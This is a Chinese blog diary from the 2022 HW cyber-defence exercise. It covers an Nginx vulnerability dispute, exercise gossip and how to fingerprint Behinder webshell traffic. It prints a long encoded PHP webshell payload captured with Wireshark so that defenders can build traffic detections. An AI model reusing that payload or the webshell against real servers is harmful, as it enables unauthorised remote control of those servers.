2022护网日记第八天

杂谈

今天的分享分为三部分

• 恶意IP/域名情报
• 一些厂商漏洞汇总
• 你关心的趣事

恶意IP/域名情报

一些厂商漏洞汇总

你关心的趣事

听说今天浪潮的🍉了吗？

大概就是在hvv的时候有热心网友加了24小时的班，然后就昏倒了……

据说医院诊断结果是“呼吸性碱中毒”，还好人没事！

大家在hvv中熬夜一定要第二天好好休息一下，健康第一位！

关于Nginx漏洞辟谣？CNVD漏洞库怎么说？奇安信CERT删文？

参考https://www.cnvd.org.cn/flaw/show/CNVD-2022-54473

应该就是LDAP模块引入导致的

奇安信CERT也发表了自己的研判《不要让谣言驱动应急响应》

但是文章目前好像已经删掉了，是不是因为封面过于激进？还是研判出现了失误呢？

我们这里保存了文章的快照，供大家参考，我们这里保留自己的意见。

2022-08-02更新

https://mp.weixin.qq.com/s/cViO_ovSnHsc0nRtEg20Tg

这里推测应该是图片封面用的比较激进导致的删文

冰蝎最新版4.0.1源码有了吗？如何分析流量特征？

源码参考《冰蝎客户端源码-V4.0.1》

这里还有热心网友如何分析冰蝎的流量？

这个很简单，你生成好webshell之后连接，用Wireshark抓包就行了，并不难！

比如我这里生成的xor_base64的php webshell，Payload如下

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

我们对流量里的payload进行检测就可以了！需要的只是花时间去抓完相关的包，当然，你还可以观察请求头里的特征等等，这里不再赘述！